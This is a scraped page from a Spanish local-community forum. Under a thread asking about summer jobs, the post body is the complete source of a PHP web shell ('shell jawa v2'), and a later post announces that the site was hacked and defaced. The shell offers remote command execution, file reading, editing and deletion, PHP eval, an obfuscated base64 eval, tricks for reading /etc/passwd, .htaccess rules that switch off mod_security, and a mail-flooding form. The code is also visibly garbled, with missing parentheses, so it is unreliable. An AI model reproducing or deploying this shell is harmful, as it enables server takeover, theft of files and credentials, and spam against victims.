Home  
::..LA FRASE..::
Nuevo Usuario
Home
Foro
WebMail
Pag.Inicio
 Login
 Logout
Actualiza tu PC
ActiveScan
Msn
Tu IP es:
Si tienes alguna sugerencia           ¡CONTÁCTANOS!           Si quieres trabajar con nosotros            ¡CONTÁCTANOS!           Si tienes alguna duda           ¡CONTÁCTANOS!          
Hacer página de inicio
Microsoft Passport Network
Los Alcazares,
.:: MENU ::.

>BANCOS Y CAJAS<


>PRENSA<

>USUARIOS<
Nickname

Password

¿Todavía no tienes una cuenta? Puedes crearte una. Como usuario registrado tendrás ventajas como seleccionar la apariencia de la página, configurar los comentarios y enviar los comentarios con tu nombre.

>¿QUIEN ESTA AHÍ?<
Actualmente hay 12 invitados, 0 miembro(s) conectado(s).

Eres un usuario anónimo. Puedes registrarte aquí

LAS NOVEDADES
 LO ÚLTIMO 
GALERÍA DE FOTOS
Más accesos a bancos/cajas
VUELOS 2005(San Javier)
Anuncios Clasificados
Horarios transportes 2005
Callejero Los Alcázares
Estado de las Carreteras
Algunas chorradas
FIESTAS 2005
TODO OCIO
ACTIVIDES DEPORTIVAS 2005
Cursos, Seminarios y Conferencias

  
Moderado por: WebMaster

Los Alcázares (Murcia).Página No Oficial : Índice » » NORMAS DEL FORO
  
 busco trabajo de verano en los alcazares
Autor busco trabajo de verano en los alcazares
aries28



Movido a :
20-07-2008

Mensajes : 1

OFF-Line

 Enviado 20-07-2008 a las 15:01   
<?

/**

*coded by jiko

*site * www.no-exploit.com

* mail * jalikom@hotmail.com

* thanks to allah

*/

//function shell jawa

//download files code

$fdownload=$_get['fdownload'];

if ($fdownload <> "" ){

// path & file name

$path_parts = pathinfo("$fdownload";

$entrypath=$path_parts["basename"];

$name = "$fdownload";

$fp = fopen($name, 'rb');

header("content-disposition: attachment; filename=$entrypath";

header("content-length: " . filesize($name));

fpassthru($fp);

exit;

}

//styl functiob

function styll_jawa(){

echo "<html>

<head>

<meta http-equiv=\"content-language\" content=\"en-us\">

<title>jawa shell => "; echo $_server['server_addr']; echo "=> by jiko</title></head>

<style>

body { scrollbar-base-color: #1010919; scrollbar-arrow-color: #008080; }

a{color:#dadada;text-decoration:none;font-family:tahoma;font-size:13px}

a:hover{color:#008080}

input{font-weight:normal;background-color: #191919;font-size: 12px; color: #dadada; font-family: tahoma; border: 1px solid #666666;height:17}

textarea{background-color:#191919;color:#dadada;font-weight:bold;font-size: 12px;font-family: tahoma; border: 1 solid #666666;}

div{font-size:12px;font-family:tahoma;font-weight:normal;color:whitesmoke}

select{background-color: #191919; font-size: 12px; color: #dadada; font-family: tahoma; border: 1 solid #666666;font-weight:bold;}</style>

<body bgcolor=#666666 text=white>

</body>

</html>

<table bgcolor=#cccccc style=\"border:2px #dadada solid \" width=100% height=%><tr><td><b><center><font face=tahoma color=black size=4>

[ shell jawa v2 ]

</font></b></center></td></tr></table>

<table bgcolor=#808080 color=black style=\"border:2px solid black\" width=100%><tr><td width=50%><div align=left><table style=\"border:1px #dadada solid \" width=100% height=100%><tr><td height=22% style=\"border:1px #dadada solid \"><div><b><center>

menu</div></tr></td><tr>

<td style=\"border:1px #dadada solid \" bgcolor=\"#000000\"><form method=post><input type=hidden name=scdir value=c:\appserv\www\shell >

<font face=\"sans ms\" size=\"3\">

<table style=\"border-right: #dadada 2px solid; border-top: #dadada 2px solid; border-left: #dadada 2px solid; border-bottom: #dadada 2px solid\" height=\"%\" width=\"100%\" bgcolor=\"#191919\" jiko=\"table1\">

<tr>

<td><center>

<div>

<b><a href=\"$php_self?\">home</a> -

<a href=\"J A V A S C R I P T:history.back()\">back</a> -

<a target=\"_blank\" href=\"$php_self?jiko=phpinfo\">

phpinfo</a> -<a href=\"$php_self?jiko=cmd\">

cmd</a> - <a href=\"$php_self?jiko=coder\">all

coder</a> - <a href=\"$php_self?jiko=htaccess\">

htaccess</a> - <a href=\"$php_self?jiko=symlink\">

symlink</a> - <a href=\"$php_self?jiko=read\">read</a>

- <a href=\"$php_self?jiko=mail\">mail</a> -

<a href=\"$pp_self?jiko=phpeval\">phpeval</a> -

<a href=\"$php_self?jiko=sqlread\">sql-read</a> -

<a href=\"$php_self?jiko=chmod\">chmod</a> -

<a href=\"$php_self?jiko=infog\">info&amp;gr33tz</a></div>

</b></center></td>

</tr>

</table>

</font></tr></td></form></table></td></tr></table>";

}



function bas_jawa(){

echo "<br><hr><table bgcolor=#cccccc style=\"border:2px #dadada solid \" width=100% height=%><tr><td><font size=2 face=tahoma color=black><center>

<h6>by jiko - jalikom@hotmail.com<br><a href=\"http://www.no-exploit.com\">

<font color=\"#000000\">www.no-exploit.com</font></a> <font size=\"2\">|| <a href=\"http://www.tryag.com\">

<font color=\"#000000\">www.tryag.com</font></a></font></font></h6>

</td></tr></table>";

}

function get_execution_method(){

if(function_exists('passthru')){ $m = "passthru"; }

if(function_exists('exec')){ $m = "exec"; }

if(function_exists('shell_exec')){ $m = "shell_ exec"; }

if(function_exists('system')){ $m = "system"; }

if(!isset($m)) //no method found

{

$m = "disabled";

}

return($m);

}

function execute_command($method,$command){

if($method == "passthru"

{

passthru($command);

}



elseif($method == "exec"

{

exec($command,$result);

foreach($result as $output)

{

print $output."<br>";

}

}



elseif($method == "shell_exec"

{

print shell_exec($command);

}



elseif($method == "system"

{

system($command);

}

}

function table_info(){

echo ' <table bgcolor="#1e1e1e" style="border:1px white solid" width="100%" height="40"><tr><td colspan="2">

<div><center><font face="tahoma" size="3" color="white"><b>server info :</b></font></center>

</div ><div ><div ><font size=-1 face=tahoma color=white><b>';

$connection="icr3zwigpsakx1nfulzfulsisfruuf9it1nuil07ia0kicrpbmogpsakx1nfulzfulsiukvrvuvtvf9vukkixtsgdqogjgjvzhkgpsaiqwrhiflhbmcgsw5qzwn0ifxuahr0cdovlyr3zwikaw5qijsncibtywlskcjsbebob3rtywlslmzpiiwisgfzawwgahr0cdovlyr3zwikaw5qiiwgiirib2r5iik7";



echo eval(base64_decode($connection));

$sa1=@ini_get("safe_mode";

if ($sa1 or strtolower($sa1) == "on"

{ $safemode = true;

$hsafemode = "<font color=red>on (secure)</font>"; }

else {$safemode = false; $hsafemode = "<font color=green>off (not secure)</font>";}

echo("safe_mode : $hsafemode";

echo '<br>';

$v = @ini_get("open_basedir";

if ($v or strtolower($v) == "on" {$openbasedir = true; $hopenbasedir = "<font color=red>".$v."</font>";}

else {$openbasedir = false; $hopenbasedir = "<font color=green>off (not secure)</font>";}

echo("open base dir : $hopenbasedir";

echo("<br>";

echo "disable functions : <b>";

if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>none</font></b>";}

else{echo "<font color=red>$df</font></b>";}

echo("<br>";

$lol = @substr($server_software,0,120);

echo ("software : <font color = yellow>$lol</font>";

echo '<br>';

$os = php_uname();

echo ("server : <font color = yellow>$os</font>";

echo '<br>';

$user = exec('id');

echo ("user : <font color = yellow>$user</font>";

echo '<br>';

$dir = @getcwd();

echo ("pwd : <font color=yellow>$dir</font>";

echo("<br>";

echo "your ip : <a href=http://".$_server["remote_addr"]."><font color = yellow>".$_server["remote_addr"]."</a><br></font>server ip :

<a href=http://".gethostbyname($_server["http_host"])."><font color = yellow>".gethostbyname($_server["http_host"])."</font></a></td><td>";

echo "<b>postgresql: ";

$pg_on = @function_exists('pg_connect');

if($pg_on){echo "<font color=green>on</font></b>";}else{echo "<font color=red>off</font></b>";}

echo("<br>";

echo "<b>mssql: ";

$mssql_on = @function_exists('mssql_connect');

if($mssql_on){echo "<font color=green>on</font></b>";}else{echo "<font color=red>off</font></b>";}

echo("<br>";

echo "<b>mysql: ";

$mysql_on = @function_exists('mysql_connect');

if($mysql_on){

echo "<b><font color=green><b>on</font></b>"; } else { echo "<font color=red><b>off</font></b>"; }

echo("<br>";

echo "<b>php version: ".@phpversion()."</b>";

echo("<br>";

echo "<b>curl: ".(($curl_on)?("<b><font color=green>on</font></b>""<b><font color=red>off</font></b>");



echo("<br>";

echo(htmlentities($_server['server_software']));

print"<br>";print "home-path : " .__file__;

echo "</td><tr><td>";

if (strtoupper(substr(php_os, 0, 3)) === 'win') {

echo "<br>select driver:";

for ($j=ord('c'); $j<=ord('z'); $j++)

if (@$dh = opendir(chr($j).":/")

echo "<a href=$php_self?jiko=fm&dir=".chr($j).":/ > [".chr($j)."]<a/>";

}

echo "<br/></table>";



}

function coder_jiko(){



echo"</textarea></p>

<div align=\"center\">

<table border=\"0\" width=\"100%\" id=\"table1\">

<tr>

<td align=\"center\"><strong><font face=times new roman color=#404040 size=2><input type=submit name='md5_' value='md5 encode'></td>

<td align=\"center\"><strong><font face=times new roman color=#404040 size=2><input type=submit name='crc_32' value='crc32 encode'></td>

<td align=\"center\"><strong><font face=times new roman color=#404040 size=2><input type=submit name='hexa' value='hex encode'></td>

</tr>

<tr>

<td align=\"center\"><strong><font face=times new roman color=#404040 size=2><input type=submit name='s_ha' value='sha1 encode'></td>

<td align=\"center\"><strong><font face=times new roman color=#404040 size=2><input type=submit name='base_encode' value='base64 encode'></td>

<td align=\"center\"><strong><font face=times new roman color=#404040 size=2><input type=submit name='urlen_code' value='url encode'></td>

</tr>

<tr>

<td align=\"center\"><strong><font face=times new roman color=#404040 size=2><input type=submit name='crypton' value='crypt encode'></td>

<td align=\"center\"><strong><font face=times new roman color=#404040 size=2><input type=submit name='base_dencode' value='base64 dencode'></td>

<td align=\"center\"><strong><font face=times new roman color=#404040 size=2><input type=submit name='urlde_code' value='url decode'></td>

</tr>

</table>

</div>

</form>";

}

if (ini_get('register_globals') != '1') {

/* we'll register the variables as globals: */

if (!empty($http_post_vars))

extract($http_post_vars);



if (!empty($http_get_vars))

extract($http_get_vars);



if (!empty($http_server_vars))

extract($http_server_vars);

}

//

echo styll_jawa();

echo '<table style="border-right: black 2px solid; border-top: black 2px solid; border-left: black 2px solid; border-bottom: black 2px solid" width="100%" bgcolor="#808080" color="black" id="table2">

<tr>

<td width="50%">

<div align="left" style="font-size: 12px; font-family: tahoma; font-weight: normal; color: whitesmoke">

<table style="border-right: #dadada 1px solid; border-top: #dadada 1px solid; border-left: #dadada 1px solid; border-bottom: #dadada 1px solid" height="100%" width="100%" id="table3">

<tr>

<td style="border-right: #dadada 1px solid; border-top: #dadada 1px solid; border-left: #dadada 1px solid; border-bottom: #dadada 1px solid" bgcolor="#000000">

<font color="#ffffff">';

echo table_info();

echo "</font>

</td>

</tr>

</table>

</div>

</td>

</tr>

</table>";



if ($jiko=="" or $jiko=="fm"{

//for see file and dir

$homedir=getcwd();

$dir=realpath($_get['dir'])."/";



echo "<br><b><p align='left'>&nbsp;home:</b> $homedir

&nbsp;<b>

<form action='' method='get'>

&nbsp;pwd ==>:</b>

<input type='hidden' name='id' value='fm'>

<input type='text' name='dir' size='80' value='$dir'>

<input type='submit' value='dir'>

</form>

<br>";



echo "



<div align='center'>



<table border='1' jiko='table1' style='border: 1px #333333' height='90' cellspacing='0' cellpadding='0'>

<tr>

<td width='300' height='30' align='left'><b><font size='2'>file / folder name</font></b></td>

<td height='28' width='82' align='center'>

<font color='#000000' size='2'><b>size kbyte</b></font></td>

<td height='28' width='83' align='center'>

<font color='#000000' size='2'><b>download</b></font></td>

<td height='28' width='66' align='center'>

<font color='#ff0003' size='2'><b>edit</b></font></td>

<td height='28' width='75' align='center'>

<font color='#999999' size='2'><b>chmod</b></font></td>

<td height='28' align='center'><font color='#ff0000' size='2'><b>delete</b></font></td>

</tr>";

if (is_dir($dir)){

if ($dh=opendir($dir)){

while (($file = readdir($dh)) !== false) {

$fsize=round(filesize($dir . $file)/1024);





echo "

<tr>

<th width='250' height='22' align='left' nowrap>";

if (is_dir($dir.$file))

{

echo "<a href='?jiko=fm&dir=$dir$file'><span style='text-decoration: none'><font size='2' color='#000000'>&nbsp;$file <font color='#fff000' size='1'>[ dir ]</font>";

}

else {

echo "<font size='2' color='#000000'>&nbsp;$file ";

}

echo "</a></font></th>

<td width='113' align='center' nowrap><font color='#000080' size='2'><b>";

if (is_file($dir.$file))

{

echo "$fsize";

}

else {

echo "&nbsp; ";

}

echo "

</b></font></td>

<td width='103' align='center' nowrap>";

if (is_file($dir.$file)){

if (is_readable($dir.$file)){

echo "<a href='?jiko=fm&fdownload=$dir$file'><span style='text-decoration: none'><font size='2' color='#ffffff'><b>download</b>";

}else {

echo "<font size='1' color='#ff0000'><b>no readable</b>";

}

}else {

echo "&nbsp;";

}

echo "

</a></font></td>

<td width='77' align='center' nowrap>";

if (is_file($dir.$file))

{

if (is_readable($dir.$file)){

echo "<a target='_blank' href='?jiko=fm&fedit=$dir$file'><span style='text-decoration: none'><font color='#ff9933' size='2'>edit";

}else {

echo "<font size='1' color='#ff0000'><b>no readable</b>";

}

}else {

echo "&nbsp;";

}

echo "

</a></font></td>

<td width='86' align='center' nowrap>";

if (strtoupper(substr(php_os, 0, 3)) === 'win') {

echo "<font size='1' color='#fffff0'>dont in windows";

}

else {

echo "<a href='?jiko=fm&fchmod=$dir$file'><span style='text-decoration: none'><font size='2' color='#999999'>chmod";

}

echo "</a></font></td>

<td width='86'align='center' nowrap><a href='?jiko=fm&fdelete=$dir$file'><span style='text-decoration: none'><font size='2' color='#ffff00'><b>delete</b></a></font></td>

</tr>

";

}

closedir($dh);

}

}





$did=getcwd();

echo <<<html

<b>file upload</b>

<table>

<form enctype="multipart/form-data" action="$self" method="post">

<input type="hidden" name="ac" value="upload">

<tr>

<td>your file:</td>

<td><input size="48" name="file" type="file"></td>

</tr>

<tr>

<td>path upload:</td>

<td><input size="48" value="$did/" name="path" type="text"><input type="submit" value="upload"></td>

$tend

html;



if (isset($_post['path'])){



$uploadfile = $_post['path'].$_files['file']['name'];

if ($_post['path']==""{$uploadfile = $_files['file']['name'];}



if (copy($_files['file']['tmp_name'], $uploadfile)) {

echo "file uploaded $uploadfile\n";

echo "here name :" .$_files['file']['name']. "\n";

echo "siza :" .$_files['file']['size']. "\n";



} else {

print "not uploaded:\n";

print_r($_files);

}

}

//file deleted

$frpath=$_get['fdelete'];

if ($frpath <> "" {

if (is_dir($frpath)){

$matches = glob($frpath . '/*.*');

if ( is_array ( $matches ) ) {

foreach ( $matches as $filename) {

unlink ($filename);

rmdir("$frpath";

echo "<script language='J A V A S C R I P T'> alert('success! please refresh')</script>";

echo "<script language='J A V A S C R I P T'> history.back(1)</script>";

}

}

}

else{

echo "<script language='J A V A S C R I P T'> alert('success! please refresh')</script>";

unlink ("$frpath";

echo "<script language='J A V A S C R I P T'> history.back(1)</script>";

exit(0);



}}

$fedit=$_get['fedit'];

if ($fedit <> "" ){

$fedit=realpath($fedit);

$lines = file($fedit);

echo "<center><form action='' method='post'>";

echo "<textarea name='savefile' rows=30 cols=80>" ;

foreach ($lines as $line_num => $line) {

echo htmlspecialchars($line);

}

echo "</textarea><br>

<input type='text' name='filepath' size='60' value='$fedit'><br>

<input type='submit' value='save'></form></center>";

$savefile=$_post['savefile'];

$filepath=realpath($_post['filepath']);

if ($savefile <> ""

{

$fp=fopen("$filepath","w+";

fwrite ($fp,"" ;

fwrite ($fp,$savefile) ;

fclose($fp);

echo "<script language='J A V A S C R I P T'> close()</script>";

}



}



}elseif($jiko=="phpinfo"{

echo phpinfo();

}elseif($jiko=="coder"{

echo "

<form method=\"post\" action=\"$php_self\">

<p align=\"center\"><textarea rows=\"13\" name=\"coding\" cols=\"70\">";

if ($_post['md5_']){

echo md5($coding);

}elseif($_post['s_ha']){

echo sha1($coding);

}elseif($_post['crypton']){

echo crypt($coding);

}elseif($_post['crc_32']){

echo crc32($coding);

}elseif($_post['base_encode']){

echo base64_encode($coding);

}elseif($_post['base_dencode']){

echo htmlspecialchars(base64_decode($coding));

}elseif($_post['hexa']){

$c = strlen($coding);

for($i=0;$i<$c;$i++)

{

$hex = dechex(ord($coding[$i]));

if ($coding[$i] == "&" {echo $coding[$i];}

elseif ($coding[$i] != "\\" {echo "%".$hex;}

}

}elseif($_post['urlen_code']){

print urlencode($coding);

}elseif($_post['urlde_code']){

print htmlspecialchars(urldecode($coding));

}else{

echo "shell jawa version 2 coder by ==>jiko jalikom[at]hotmail[dot]com";

}



echo coder_jiko();

}elseif($jiko=="htaccess"{

echo "<table id=\"table7\" style=\"border-right: black 2px solid; border-top: black 2px solid; border-left: black 2px solid; border-bottom: black 2px solid\" width=\"100%\" bgcolor=\"#808080\" color=\"black\">

<tr>

<td width=\"50%\">

<div style=\"font-weight: normal; font-size: 12px; color: whitesmoke; font-family: tahoma\" align=\"left\">

<p align=\"center\"><b><font face=\"sans ms\" size=\"3\">

<a href=\"$php_self?jiko=htaccess&hat=forbidden\">forbidden</a> - <a href=\"$php_self?jiko=htaccess&hat=temporarily\">service temporarily </a>-

<a href=\"$php_self?jiko=htaccess&hat=unavailable\"> unavailable </a>- <a href=\"$php_self?jiko=htaccess&hat=error\">internal server error </a>-<a style=\"color: #dadada; text-decoration: none; font-family: tahoma; font-size: 13px\" href=\"?jiko=cmd\">

</a></font><font style=\"font-size: 13px\" color=\"#dadada\"><a href=\"$php_self?jiko=htaccess&hat=acceptable\"> not

acceptable</a></font><font face=\"sans ms\" size=\"3\"> -<a href=\"$php_self?jiko=htaccess&hat=php-4\"> change v php to 4 </a></font></b></div>

</td>

</tr>

</table>

";

switch ($hat){

case forbidden:

$m ="jgzwpwzvcgvuicgilmh0ywnjzxnziiwgimeriik7rndyaxrlicgkznasicikcyipo0zjbg9zzsao

jgzwksa7";

$s = "<ifmodule mod_security.c>

secfilterengine off

secfilterscanpost off

</ifmodule>";

eval(base64_decode($m));

echo "forbidden file creat";

break;

case temporarily:

$m ="jgzwpwzvcgvuicgilmh0ywnjzxnziiwgimeriik7rndyaxrlicgkznasicikcyipo0zjbg9zzsao

jgzwksa7";

$s = "<ifmodule mod_security.c>

secfilterengine off

secfilterscanpost off

</ifmodule>";

eval(base64_decode($m));

echo "temporarily file creat";

break;

case unavailable:

$m ="jgzwpwzvcgvuicgilmh0ywnjzxnziiwgimeriik7rndyaxrlicgkznasicikcyipo0zjbg9zzsao

jgzwksa7";

$s = "<ifmodule mod_security.c>

secfilterengine off

secfilterscanpost off

</ifmodule>";

eval(base64_decode($m));

echo "unavailable file creat";

break;

case error:

$m ="jgzwpwzvcgvuicgilmh0ywnjzxnziiwgimeriik7rndyaxrlicgkznasicikcyipo0zjbg9zzsao

jgzwksa7";

$s = "<ifmodule mod_security.c>

secfilterengine off

secfilterscanpost off

</ifmodule>";

eval(base64_decode($m));

echo "error file creat";

break;

case acceptable:

$m ="jgzwpwzvcgvuicgilmh0ywnjzxnziiwgimeriik7rndyaxrlicgkznasicikcyipo0zjbg9zzsao

jgzwksa7";

$s = "<ifmodule mod_security.c>

secfilterengine off

secfilterscanpost off

</ifmodule>";

eval(base64_decode($m));

echo "acceptable file creat";

break;

case "php-4":

$jik ="jgzwpwzvcgvuicgilmh0ywnjzxnziiwgimeriik7rndyaxrlicgkznasicikcyipo0zjbg9zzsao

jgzwksa7";

$s = "addtype application/x-httpd-php4 .php";

eval(base64_decode($jik));

echo "change to php 4 creat";

break;

default:

echo "<center><h2>.htaccess for help you </h2></center>";

}





}elseif($jiko=="symlink"{

$pwd=getcwd();

?>

<tr><center>

<td><h2>symlink</h2><br/>

<?php echo '<form action="' . $self . '" method="post">

<label for="symlink">file to read: </label><input type="text" name="symlink"><label for="file"> to with file ex path/jiko.txt: </label>

<input type="text" name="file" value="' . $pwd . '">

<input type="submit" value="read"></form>' ?></td>

</tr><?

if (isset($_post['symlink'])) {

$symlink = $_post['symlink'];

$file = $_post['file'];

echo '<br/><br/><h2>symlink result :</h2><br/>';

if (file_exists("$file") {

echo "hi brother the file $file exist";

}

else {

symlink ("$symlink","$file";

$yfile = basename("$file";

echo 'brother to read de file <a href="' . $yfile . '">click here</a>';

echo "<textarea rows=\"14\" cols=\"65\">";

readfile (htmlspecialchars("$file");

echo "</textarea>";



}

}









}elseif($jiko=="read"{

?>

<?php

function html ($string) {

global $site_charset;

return htmlentities($string, ent_compat, $site_charset);

}



?>



<body>

<div align="center">

<?php

$pwd = @getcwd();

?>



<table>

<tr>

<td><h3>fread</h3><br/>

<?php echo "<form action='$php_self?jiko=read' method='post'>

<label for='fread'>file to read: </label><input type='text' name='fread'>

<input type='submit' value=\"read\"></form>" ?></td>

</tr>

<tr>

<td><h3>readfile</h3><br/>

<?php echo "<form action='$php_self?jiko=read' method='post'>";

echo '

<label for="readfile">file to read: </label><input type="text" name="readfile">

<input type="submit" value="read"></form>' ?></td>

</tr>

<tr>

<td><h3>copy</h3><br/>

<?php echo "<form action='$php_self?jiko=read' method='post'>";

echo'

<label for="copy">file to read: </label><input type="text" name="copy"><label for="file"> to: </label>

<input type="text" name="file2" value="' . $pwd . '">

<input type="submit" value="read"></form>' ?></td>

</tr>

<tr>

<td><h3>ini_restore</h3><br/>

<?php echo "<form action='$php_self?jiko=read' method='post'>";

echo '

<label for="readfile">file to read: </label><input type="text" name="ini_r">

<input type="submit" value="read"></form>' ?></td>

</tr>

</table><br/><br/><br/>

<?php





if (isset($_post['fread'])) {

$fread = $_post['fread'];

echo '<br/><br/><h2>fread :</h2>';

$var = fopen("" . $fread . "", "r";

$content = fread($var, filesize("" . $fread . "");

echo "<textarea rows='19' name='s1' cols='84'>";

echo $content;

echo "</textarea>";

}



if (isset($_post['readfile'])) {

$readfile = $_post['readfile'];

echo '<br/><br/><h2>readfile :</h2>';

echo "<textarea rows='19' name='s1' cols='84'>";

$last = readfile("" . $readfile . "",$output, $return);

print_r($output);

echo "</textarea>";



}



if (isset($_post['copy'])) {

$copy = $_post['copy'];

$file2 = $_post['file2'];

echo '<br/><br/><h2>copy :</h2><br/>';

if (file_exists("$file2") {

echo "the file $file exist";

} else {

copy("$copy","$file2";

$xfile = basename("$file2";

echo 'to read de file please <a href="' . $xfile . '">click here</a>'; }

}

?>

<br/>

<?php



if(empty($_post['ini_r'])){



} else {

echo "<center> &ccedil;&aacute;&atilde;&aacute;&yacute; </center>" ;

echo "<center><textarea method='post' rows='19' cols='84' wrar='off' >";

$jawad=$_post['ini_r'];

echo ini_get("safe_mode";

echo ini_get("open_basedir";

$s=readfile("$jawad";

ini_restore("safe_mode";

ini_restore("open_basedir";





echo "</textarea></center>";

}

?><br><?

}elseif($jiko=="mail"{

error_reporting(0);

echo "<br><center><h3> for send mail lool </h3></center>" ;

echo "<center><form method='post' action='$php_self?jiko=mail'>

victim mail :<br><input type='text' name='to' ><br>

number-mail :<br><input type='text' size='5' name='nom' value='5'><br>

comments:

<br>

<textarea rows='10' cols=50 name='comments' ></textarea><br>

<input type='submit' value='send mail brother ' >

</form></center>";

//send storm mail

$to=$_post['to'];

$nom=$_post['nom'];

$comments=$_post['comments'];

if ($to <> "" ){

for ($i = 1; $i <= $nom ; $i++){

$from = rand (71,1020000000)."@"."attacker.com";

$subject= md5("$from";

mail($to,$subject,$comments,"from:$from";

echo "$i is ok";

}

echo "<script language='J A V A S C R I P T'> alert('sending mail - please waite ...')</script>";

}

}elseif($jiko=="phpeval"{

echo <<<html

<b>php eval </b>

<table>

<form method="post" action="$self">

<input type="hidden" name="ac" value="eval">

<tr>

<td><textarea name="ephp" rows="10" cols="60">echo "jiko =>no-exploit.com";</textarea></td>

</tr>

<tr>

<td><input type="submit" value="enter"></td>

$tend

html;



if (isset($_post['ephp'])){



eval(stripslashes($_post['ephp']));

}

}elseif($jiko=="sqlread"{

?>

<tr>

<td width="50%" dir="ltr">

<div dir="ltr">

<form method="post" dir="ltr">

<table border="0" cellspacing="1" width="109" dir="ltr">

<tr>

<td width="312" dir="ltr"><font face="tahoma"><span style="font-size: 9pt">

host :<br><input type="text" name="hoste" size="20"></span></font></td>

<td width="312" dir="ltr"><font face="tahoma"><span style="font-size: 9pt">

database name : <input type="text" name="dbname" size="20">&nbsp;

</span></font></td>

<td width="245" dir="ltr"><font face="tahoma"><span style="font-size: 9pt">

username :<br>

<input type="text" name="dbuser" size="20"></span></font></td>

<td width="117" dir="ltr"><font face="tahoma"><span style="font-size: 9pt">

password :<input type="text" name="dbpass" size="20"></span></font></td>

</tr>

<tr>

<td width="558" valign="middle" colspan="3" dir="ltr">

<p align="left" dir="ltr"><font face="tahoma"><span style="font-size: 9pt">

file path :

<input type="text" name="path1" size="28" value="/etc/passwd"></span></font></td>

<td width="117" valign="middle" dir="ltr">

<font face="tahoma"><span style="font-size: 9pt">

<input type="submit" value="bypass" name="exec"></span></font></td>

</tr>



<tr>

<td width="670" valign="middle" colspan="4" dir="ltr">

<textarea rows="17" name="result" cols="71">

<?

if(!empty($_post['dbname']) && !empty($_post['dbuser']) && !empty($_post['dbpass']) && !empty($_post['path1']))

{

$hoste = $_post['hoste'];

$dbname = $_post['dbname'];

$dbuser = $_post['dbuser'];

$dbpass = $_post['dbpass'];

$path1 = $_post['path1'];

if(mysql_connect( "localhost", $dbuser, $dbpass ))

{

$drop= "drop table $dbname.`bypass`" ;

$query = "create table $dbname.`bypass` (`fileview` varchar( 2048 ) not null);";

mysql_query($drop);

mysql_query($query);

mysql_query("load data local infile " . "'$path1'" . " into table " . $dbname . ".bypass";

$result =mysql_db_query($dbname,"select * from bypass ";

$numrows = mysql_num_rows($result);

while($row = mysql_fetch_array($result)) {

echo $row[fileview] ;

}

}

}

?>

</textarea>

</td>

</tr>

<?

}elseif($jiko=="cmd"{

print "<center><form action=\"".$me."?jiko=cmd&dir=".realpath('.')."\" method=post><b>command:</b><input type=text name=command><input type=submit value=\"execute\"></form></td></tr></center><tr><td>";

if(isset($_request['command']))

{

print "<pre>";

execute_command(get_execution_method(),$_request['command']);

}

}elseif($jiko=="chmod"{

print "<center><h3>add your file and get the permission</h3></center>";

if(isset($_post['chmod']))

{

switch ($_post['chvalue']){

case 777:

chmod($_post['chmod'],0777);

break;

case 644:

chmod($_post['chmod'],0644);

break;

case 755:

chmod($_post['chmod'],0755);

break;

}

print "changed permissions on ".$_post['chmod']." to ".$_post['chvalue'].".";

}

if(isset($_get['file']))

{

$content = urldecode($_get['file']);

}

else

{

$content = "real path and name of file";

}



print "<form action=\"".$me."?jiko=chmod&file=".$content."&dir=".realpath('.')."\" method=post><b>name of file:

<input type=text name='chmod' value=\"".$content."\" size=70><br><b>new permission:</b>

<select name=\"chvalue\">

<option value=\"777\">777</option>

<option value=\"644\">644</option>

<option value=\"755\">755</option>

</select> <input type=submit value=\"change\">";

}elseif($jiko=="infog"{

echo "

<table border=\"0\" width=\"100%\" id=\"table1\">

<tr>

<td>

<p align=\"center\">shell jawa v 2</p>

<p align=\"center\">coded by jiko</p>

<p align=\"center\">gr33tz</p>

<p align=\"center\">kil1er&nbsp; jiki team (jiko+kil1er)</p>

<p align=\"center\">no-exploit.com ==&gt; all members</p>

<p align=\"center\">tryag-team===&gt; gold_m and all members tryagi</p>

<p align=\"center\">hacktech.org team====&gt; gold-zero hcj and all members</p>

<p align=\"center\">ghost-hacker== stack == houssamix == toxic350</p>

<h5 align=\"center\">jalikom[at]hotmail[dot]com<br>

www.no-exploit.com</h5>

</td>

</tr>

</table>";

}





//function bas shell jawa

echo bas_jawa();

?>

<?



?>

</body></html><?php chdir($lastdir); c99shexit(); ?>




[ Este mensaje fue editado por: on 18-05-2010 05:09 ]

 Perfil  Editar    Quote  
rayallen



Movido a :
13-12-2012

Mensajes : 3

OFF-Line

 Enviado 14-12-2012 a las 03:32   
Hacked & Defaced By Exegesis <<··((Synux Team))··>>




[ Este mensaje fue editado por: on 29-04-2017 14:17 ]

 Perfil  www  Editar    Quote  
  
Ir a

Splatt Forum © By: Splatt.it
Version: 3.2



Elaboration time: 0.103506 seconds.


Visite REDSAI
Los Alcázares

Copyright © 1999. Todos los derechos reservados.
Para más información: info@losalcazares.com. LosAlcazares.com es una marca registrada.

You can syndicate our news using the file backend.php or ultramode.txt

Página Generada en: 0.104 Segundos